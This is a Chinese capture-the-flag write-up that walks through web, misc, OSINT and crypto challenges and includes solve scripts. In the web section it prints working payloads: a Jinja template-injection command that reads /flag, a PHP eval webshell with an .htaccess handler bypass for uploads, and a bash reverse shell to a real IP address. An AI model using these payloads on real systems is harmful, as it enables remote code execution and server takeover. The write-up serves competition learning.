WEB

ezpython

在页面源码中找到路由 /s3c0nd,访问后发现需要 fuzz(直接盲猜 114514,结果对了);通过后是一个 SSTI(服务端模板注入)点,GET 参数 name 的值会被当作模板渲染,直接利用即可

GET:name={{lipsum.__globals__['os'].popen('cat /flag').read()}}

image-20250816113602863

ctfplus{6b0f159b-165b-4d18-86ae-5a49709ea088}

1ezbypass

<?php

// Challenge source as quoted by the write-up. The `test` query parameter is fully attacker-controlled.
$test=$_GET['test'];

// Denylist filter: rejects digits, a set of punctuation characters and a list of
// function-name substrings (case-insensitive, /i). Input passing the filter is executed as PHP.
// NOTE(review): a denylist in front of eval() is not a security boundary; anything the
// list does not name stays available. The robust fix is to never eval() request data
// and, where dynamic dispatch is needed, to map input onto a fixed allowlist of operations.
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\|implode|phpinfo|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|split|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|dir|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|rand|flip|flip|rand|content|session_id|session_start|echo|readfile|highlight|show|source|file|assert/i", $test)){
eval($test);
}
else{
echo "oh nonono hacker!";
}

// Prints this file's own source after the request has been handled.
highlight_file(__FILE__);

1ezupload

题目检测了 `<?` 和 `@` 这两个字符串

<script language='php'>eval($_POST[123]);</script>
bash -c 'bash -i >& /dev/tcp/47.108.237.7/1223 0>&1' >
<FilesMatch "1.phtml">
SetHandler application/x-httpd-php
</FilesMatch>
auto_prepend_file = 1.jpg

1Pickle♥dill

% import io
% raise Exception(io.FileIO('/flag').read().decode('latin1'))

MISC

签到

将题目给出的字符串 base64 解码得到一个域名,然后查询该域名的 TXT 记录

dig TXT ctf.ctf.vin

image-20250816114654407

flag{W3lc0m3_T0_NETDREAMCTF!!!!!}

ezimg

发现图片文件末尾有一串 base64 编码,解码得到一个腾讯文档地址 https://docs.qq.com/doc/DZWxobHhmRW9pd09k 。文档上写着 flag 不在这里,但刷新页面时可以看到,在图片加载出来之前,图片下方有一串编码;在页面中全选后复制粘贴,可以得到以下内容:

image-20250816135607305

并非flag
flag{114514-1919810-B1ngF3i_1s_a_@mazing_0ld3r}
aHR0cHM6Ly93d2duLmxhbnpvdWwuY29tL2kzcTR5MzBodWVmYQ==

将上面的 base64 字符串解码得到 https://wwgn.lanzoul.com/i3q4y30huefa ,下载其中的源码后让 AI 写了一个解密脚本,运行得到 flag

from cryptography.fernet import Fernet
import base64

# Build the Fernet key from the decoy flag: take its first 32 bytes (NUL-padding
# only if the string were shorter) and urlsafe-base64 encode them.
# NOTE: a key derived from a readable string carries far less entropy than one
# produced by Fernet.generate_key(); anyone who sees the string has the key.
decoy_flag = b'flag{114514-1919810-B1ngF3i_1s_a_@mazing_0ld3r}'
raw_key = decoy_flag[:32].ljust(32, b'\0')
key = base64.urlsafe_b64encode(raw_key)

# Ciphertext (a Fernet token) supplied with the challenge.
encrypted = b'gAAAAABoa6KH5msX3aA5PUiSZq1Ubma9DvtpU9ywyijLEbfQYNl-hn5Q_4NlmpcAD2pNjq07KvMYd2R32Id_R_3iW5GZn3yKTBW5R_5jFI_307_S9oep0zE0dhZCf_XOymC2WQhB2_6s'

# Fernet authenticates the token before decrypting, so a wrong key raises
# InvalidToken instead of returning garbage.
decrypted = Fernet(key).decrypt(encrypted)

# Show the recovered plaintext.
print(decrypted.decode())

image-20250816135300928

flag{Hu@ngD0w_L0v3s_M1sc_F0r3v3r!!!!!}

I_AM_K

import base64

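def _caesar_unshift(text, shift):
    """Rotate each ASCII letter of *text* back by *shift* places, keeping its case.

    Digits, ``+``, ``/`` and every other character pass through unchanged.
    """
    out = []
    for ch in text:
        if 'a' <= ch <= 'z':
            out.append(chr((ord(ch) - ord('a') - shift) % 26 + ord('a')))
        elif 'A' <= ch <= 'Z':
            out.append(chr((ord(ch) - ord('A') - shift) % 26 + ord('A')))
        else:
            out.append(ch)
    return "".join(out)


def decrypt(ciphertext):
    """Recover the plaintext of a challenge ciphertext by undoing each layer.

    The layers, outermost first, are: hex encoding, a Caesar shift applied to
    the ASCII letters of a Base64 string, Base64 itself, and a constant offset
    (``key_sum``) added to every plaintext byte modulo 256.  Neither secret
    needs to be known: the shift has only 26 candidates and the offset follows
    from the known plaintext prefix ``flag{``.

    Args:
        ciphertext: Hex string holding the encrypted message.

    Returns:
        The recovered plaintext, or a human-readable error message (in
        Chinese) when the input is not valid hex / UTF-8 or when no shift
        yields a plaintext that starts with ``flag{``.
    """
    # Layer 1: hex -> text. UnicodeDecodeError is a ValueError subclass, so a
    # single except clause covers both bad hex and bad UTF-8.
    try:
        caesar_shifted = bytes.fromhex(ciphertext).decode('utf-8')
    except ValueError:
        return "错误:密文不是有效的十六进制格式。"

    known_prefix = b"flag{"

    # Layer 2: try all 26 Caesar shifts.
    for shift in range(26):
        base64_candidate = _caesar_unshift(caesar_shifted, shift)
        # Restore any '=' padding that was stripped from the Base64 text.
        base64_candidate += '=' * (-len(base64_candidate) % 4)

        # Layer 3: Base64. In its default non-strict mode b64decode ignores
        # characters outside the alphabet, so most shifts decode to *something*;
        # the known-prefix check below is what actually selects the right one.
        # binascii.Error derives from ValueError, so there is no need to reach
        # into the base64 module for its private binascii import.
        try:
            encrypted_bytes = base64.b64decode(base64_candidate)
        except ValueError:
            continue

        if len(encrypted_bytes) < len(known_prefix):
            continue

        # Layer 4: derive the byte offset from the first known character, then
        # require the same offset to explain the rest of the prefix.
        key_sum = (encrypted_bytes[0] - known_prefix[0]) % 256
        if any(
            cipher_byte != (plain_byte + key_sum) % 256
            for cipher_byte, plain_byte in zip(encrypted_bytes, known_prefix)
        ):
            continue

        # Offset confirmed: strip it from every byte. latin-1 maps each byte
        # value 0-255 to the code point of the same number, i.e. chr(byte).
        return bytes((b - key_sum) % 256 for b in encrypted_bytes).decode('latin-1')

    return "解密失败,未能找到有效的解密路径。"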

# Hex-encoded ciphertext given by the challenge.
ciphertext = "686545356839417466377a5266364133695a54556a376857696f6c4e67377a5166364248"

# Run the layered recovery, then show input and result together.
decrypted_flag = decrypt(ciphertext)

for report_line in (f"密文: {ciphertext}", f"解密结果: {decrypted_flag}"):
    print(report_line)

image-20250816130831420

flag{I_am_K_hypocritical_K}

OSINT

Bridge

谷歌识图发现和重庆万州的桥相似

image-20250816114827444

去搜一下发现是牌楼长江大桥

flag{牌楼长江大桥}

Where_am_i

这个谷歌直接出

image-20250816115632375

flag{渥太华医院}

PWN

1ezpwn

CRYPTO

EzRSA

ai一把梭

import gmpy2

# Public values from the challenge. n is kept for reference; the recovery never uses it.
n = 3256593900815599638610948588846270419272266309072355018531019815816383416972716648196614202756266923662468043040766972587895880348728177684427108179441398076920699534139836200520410133083399544975367893285080239622582380507397956076038256757810824984700446326253944197017126171652309637891515864542581815539
e = 3
c = 1668144786169714702301094076704686642891065952249900945234348491495868262367689770718451252978033214169821458376529832891775500377565608075759008139982766645172498702491199793075638838575243018129218596030822468832530007275522627172632933

# c is visibly shorter than n, which is what one sees when m**e never wrapped
# around the modulus (small exponent, short message, presumably no padding).
# In that case c is a perfect cube over the integers and m is its exact root.
# Randomised padding such as OAEP is what prevents this in real deployments.
m_root, exact = gmpy2.iroot(c, e)

if not exact:
    print("Failed to recover exact integer root. Try more advanced methods.")
else:
    m = int(m_root)
    # Minimal big-endian byte length that holds m.
    byte_len = (m.bit_length() + 7) // 8
    flag_bytes = m.to_bytes(byte_len, byteorder='big')
    print("Recovered FLAG:", flag_bytes)

image-20250816115834852

flag{EZ_3Z++==+__U_C@n_F1n1sh_1t}

Quaternion_Lock

同样ai一把梭

import itertools

# Modulus for every quaternion component; numerically 2**63 - 25.
p = 9223372036854775783
# Public exponent applied to the secret quaternion K (Y is compared against K**e).
e = 65537
# Size of the search space for the secret exponent r used by the solve loop.
subgroup_order = 60480

# Challenge outputs as (a, b, c, d) component tuples.
# X is un-conjugated by the solve loop as K^-1 * X * K; Y is matched against K**e.
X = (
    7380380986429696832,
    34163292457091182,
    3636630423226195928,
    3896730209645707435,
)
Y = (
    1015918725738180802,
    4456058114364993854,
    0,
    0,
)

# ---- 四元数运算 ----
def qmul(q1, q2, p):
    """Return the Hamilton product ``q1 * q2`` with every component reduced mod *p*.

    Both operands are 4-tuples ``(a, b, c, d)`` standing for ``a + b*i + c*j + d*k``.
    The product is not commutative, so argument order matters.
    """
    w1, x1, y1, z1 = q1
    w2, x2, y2, z2 = q2

    real = w1 * w2 - x1 * x2 - y1 * y2 - z1 * z2
    i_part = w1 * x2 + x1 * w2 + y1 * z2 - z1 * y2
    j_part = w1 * y2 - x1 * z2 + y1 * w2 + z1 * x2
    k_part = w1 * z2 + x1 * y2 - y1 * x2 + z1 * w2

    return tuple(component % p for component in (real, i_part, j_part, k_part))

def qconj(q, p):
    """Return the conjugate of quaternion *q* (imaginary parts negated), reduced mod *p*."""
    w, x, y, z = q
    return tuple(component % p for component in (w, -x, -y, -z))

def qnorm(q, p):
    """Return the norm ``a^2 + b^2 + c^2 + d^2`` of quaternion *q*, reduced mod *p*."""
    w, x, y, z = q
    return sum(component * component for component in (w, x, y, z)) % p

def qinv(q, p):
    """Return the multiplicative inverse of quaternion *q* modulo *p*.

    Computed as ``conj(q) / norm(q)``. ``pow(..., -1, p)`` raises ValueError
    when the norm has no inverse mod *p* (for example when it is 0).
    """
    norm_inverse = pow(qnorm(q, p), -1, p)
    conjugate = qconj(q, p)
    return tuple(component * norm_inverse % p for component in conjugate)

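def qpow(q, exp, p):
    """Raise quaternion *q* to the non-negative integer power *exp*, modulo *p*.

    Uses square-and-multiply, so the cost is O(log exp) quaternion products.
    ``exp == 0`` returns the identity ``(1, 0, 0, 0)``.

    Raises:
        ValueError: if *exp* is negative. Floor division never brings a
            negative exponent to zero, so without this guard the loop would
            spin forever; invert with ``qinv`` first when a negative power
            is needed.
    """
    if exp < 0:
        raise ValueError("qpow requires a non-negative exponent")

    result = (1, 0, 0, 0)
    base = q
    while exp:
        # Multiply in the current power of q whenever the low bit is set.
        if exp & 1:
            result = qmul(result, base, p)
        base = qmul(base, base, p)
        exp >>= 1
    return result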

# ---- Decryption ----
# Base element h = g ** ((p*p - 1) // subgroup_order); the secret K is searched
# among its powers.
g = (2, 1, 0, 0)
h = qpow(g, (p * p - 1) // subgroup_order, p)

# Exhaustive search for r with (h**r)**e == Y. The secret exponent has fewer
# than subgroup_order (60480) candidates, which is why the scheme offers no
# real protection: the whole space is enumerated directly.
for r in range(1, subgroup_order):
    K = qpow(h, r, p)
    if qpow(K, e, p) != Y:
        continue

    print("Found r =", r)

    # Undo the conjugation: F = K^-1 * X * K.
    F = qmul(qinv(K, p), qmul(X, K, p), p)
    print("Recovered F (四元数) =", F)

    # Each component is a big-endian integer chunk of the flag; concatenate them.
    flag_bytes = b''.join(
        part.to_bytes((part.bit_length() + 7) // 8, 'big') for part in F
    )
    print("Recovered flag bytes:", flag_bytes)
    break

image-20250816125011353

flag{0k@y_U_C@n_F1n1sh_iT!!!}